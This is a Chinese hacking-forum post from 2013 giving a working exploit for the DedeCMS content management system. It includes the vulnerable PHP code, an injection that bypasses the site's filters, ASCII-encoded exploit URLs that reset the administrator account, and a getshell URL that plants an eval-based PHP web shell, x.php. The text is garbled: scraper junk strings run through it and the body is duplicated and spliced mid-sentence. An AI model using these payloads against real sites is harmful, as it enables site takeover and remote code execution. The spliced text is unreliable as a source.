中国网络渗透测试联盟

标题: dedecms最新版本修改任意管理员漏洞+getshell+exp [打印本页]
作者: admin    时间: 2013-9-21 16:08
标题: dedecms最新版本修改任意管理员漏洞+getshell+exp
此漏洞无视gpc转义,过80sec注入防御。  d1 E$ a' d  K& J3 [# {/ y
补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?0 r: |8 d1 O3 E- m1 P( F* L
起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。
2 |& a4 M3 o5 c, K+ Qinclude/dedesql.class.php
0 A% l' S' m( g/ Y" Fif(isset($GLOBALS['arrs1'])){    $v1 = $v2 = '';    for($i=0;isset($arrs1[$i]);$i++)    {        $v1 .= chr($arrs1[$i]);    }    for($i=0;isset($arrs2[$i]);$i++)    {        $v2 .= chr($arrs2[$i]);   //解码ascii    }    $GLOBALS[$v1] .= $v2; //注意这里不是覆盖,是+}function SetQuery($sql)    {        $prefix="#@__";        $sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql);  //看到这里无话可说,不明白为什么要这样做。        $this->queryString = $sql;    }另外说下绕过80sec防注入的方法。
, i2 |# ^$ M- x# H. B同一文件中,有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery2( G( K6 H: y9 Y1 s# ?6 t+ {
而用ExecuteNoneQuery2执行SQL并没有防注入,于是随便找个用ExecuteNoneQuery2执行的文件。
* `# w' O/ S6 c5 P8 ?5 d4 {1 }plus/download.php
9 z; V% L7 \0 L- Gelse if($open==1){    $id = isset($id) && is_numeric($id) ? $id : 0;    $link = base64_decode(urldecode($link));    $hash = md5($link);//这里的#@_是可以控制的    $rs = $dsql->ExecuteNoneQuery2("UPDATE `#@__downloads` SET downloads = downloads + 1 WHERE hash='$hash' ");    if($rs <= 0)     {         $query = " INSERT INTO `#@__downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); ";         $dsql->ExecNoneQuery($query);    }    header("locationlink");    exit();}构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc):
8 q# a; _% Q, v- ~admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #完整SQL语句:
  s/ P* ^* k  d( }5 G& M$ FUPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash' EXP:
4 L# @$ u& n: X1 v( Nhttp://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35如果不出问题,后台登录用户spider密码admin
) B8 j6 s: {9 t4 i漏洞真的不止一处,各种包含,远程代码执行,很多,列位慢慢研究。. v. N7 \$ ^/ U
如果找不到后台,参见以前修改数据库直接拿SHELL的方法) J5 H# C1 a3 b3 j1 Q
UPDATE `dede_mytag` SET `normbody` = '{dede:php}file_put_contents(''spider.php'',''<!--?php eval(此漏洞无视gpc转义,过80sec注入防御。
; z# r, W8 O6 W% x; ~补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?
2 h: O) {# g7 ~起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。
" D' m+ k! F6 o  d+ u) ?. U. Zinclude/dedesql.class.php
& P: P4 D8 X9 l+ W& x+ bif(isset($GLOBALS['arrs1'])){    $v1 = $v2 = '';    for($i=0;isset($arrs1[$i]);$i++)    {        $v1 .= chr($arrs1[$i]);    }    for($i=0;isset($arrs2[$i]);$i++)    {        $v2 .= chr($arrs2[$i]);   //解码ascii    }    $GLOBALS[$v1] .= $v2; //注意这里不是覆盖,是+}function SetQuery($sql)    {        $prefix="#@__";        $sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql);  //看到这里无话可说,不明白为什么要这样做。        $this->queryString = $sql;    }另外说下绕过80sec防注入的方法。: [6 n4 T4 Z# x1 D  H5 O5 e+ k
同一文件中,有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery2
3 r! o8 x( d9 `而用ExecuteNoneQuery2执行SQL并没有防注入,于是随便找个用ExecuteNoneQuery2执行的文件。
- u3 n- `  x. b: S" wplus/download.php
. y5 U- G3 e& l3 ]8 @4 F7 X, \else if($open==1){    $id = isset($id) && is_numeric($id) ? $id : 0;    $link = base64_decode(urldecode($link));    $hash = md5($link);//这里的#@_是可以控制的    $rs = $dsql->ExecuteNoneQuery2("UPDATE `#@__downloads` SET downloads = downloads + 1 WHERE hash='$hash' ");    if($rs <= 0)     {         $query = " INSERT INTO `#@__downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); ";         $dsql->ExecNoneQuery($query);    }    header("locationlink");    exit();}构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc):0 i& [4 J( l( e: i5 ?. p) X; H
admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #完整SQL语句:2 z% U/ k0 r1 T. _
UPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash' EXP:
; F+ {1 m1 ^, X2 l; M- V" Xhttp://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35如果不出问题,后台登录用户spider密码admin
- q1 m7 r2 C, k4 }6 x漏洞真的不止一处,各种包含,远程代码执行,很多,列位慢慢研究。
/ C: k6 \5 K# O% p: [如果找不到后台,参见以前修改数据库直接拿SHELL的方法
9 T$ D& k: _, U8 i" B' ]0 h$ s___FCKpd___6getshell:, H4 e- Q( W: ]4 d( z! D5 L: U
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35会在plus目录生成 x.php 密码 m2 y5 W# v9 @9 `+ Q0 Z# p+ T
http://127.0.0.1/plus/x.php( }! a* W9 @4 X; Q9 I
update成功后还要访问下 /plus/mytag_js.php?aid=17 l8 c4 n4 C# d; H; h& O
失败原因:
0 t8 g7 Q; }1 J! P; ]  E测试发现,如果aid为空或已经生成过一次,则会写shell失败….更改倒数第三个ascii改变改变aid(即&arrs2[]=49)* f! m3 ]; ]9 X( w+ h6 [  V9 L5 @- t  \
配图:
; e. j/ Z% N$ Z! y( n1.查看dede当前版本" D, k' L5 i  n9 I, s, f8 @

' [2 i8 Q) I& I! D$ V, I2 H" F2.执行exp
* R. [1 ~4 Z! t% h
" Q6 L, j9 h) f% x' c3 _2 A4 Yhttp://www.myhack58.com/Article/UploadPic/2013-9/20139913327683.png3.测试登陆后台
% j# A, {  J  n$ _% e0 ^& H5 s7 g* ?
: |; c. J9 p3 d4 ^" Nspider密码admin5 N2 J) c  p7 U1 d* w/ n7 @) o  @
3 O! I3 e. j8 h5 f' |/ |
http://www.myhack58.com/Article/UploadPic/2013-9/20139913327762.png$ a% V$ m; r0 ~' Z
原作者:imspider
' V2 k' A) p" V/ K: S: X' w
3 W* J, f! Z+ l6 k" f& H本博客测试+配图+getshell
! N5 `7 P8 b1 Z) ~POST[spider]);?-->'');{/dede:php}' WHERE `aid` =1 LIMIT 1 d* V8 {6 F* K  q4 Y

- ^9 l8 s. r  V& [* x: ]- U. X6 Fgetshell:; Q/ B# t  j5 ]( }% ]
___FCKpd___7会在plus目录生成 x.php 密码 m2 @9 |5 k! O7 }
http://127.0.0.1/plus/x.php
) j% @) q$ g6 b1 J0 O/ d- yupdate成功后还要访问下 /plus/mytag_js.php?aid=1
: N- ~$ G0 \4 r+ n9 p1 s% c失败原因:4 ]2 R. g5 s$ f& g& O6 u' f
测试发现,如果aid为空或已经生成过一次,则会写shell失败….更改倒数第三个ascii改变改变aid(即&arrs2[]=49)$ A9 J  P4 Q; d  @: P. i
配图:
" Z7 U3 L3 p1 k6 {4 M; w1.查看dede当前版本; K1 X1 ~9 `3 e& s- F  o
http://www.myhack58.com/Article/UploadPic/2013-9/20139913326739.png: @$ c+ i: l& W
2.执行exp5 F4 J, L' i: u5 [7 \
http://www.myhack58.com/Article/UploadPic/2013-9/20139913327683.png3.测试登陆后台
+ x* q$ ^/ y! O+ D5 P" g0 `/ r" w; z% Jspider密码admin
/ D% q& x1 `$ m  b0 @& uhttp://www.myhack58.com/Article/UploadPic/2013-9/20139913327762.png. g' y, j! h4 \+ I% l' H) b

2 y8 R( D0 V" ^& P" j+ b



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2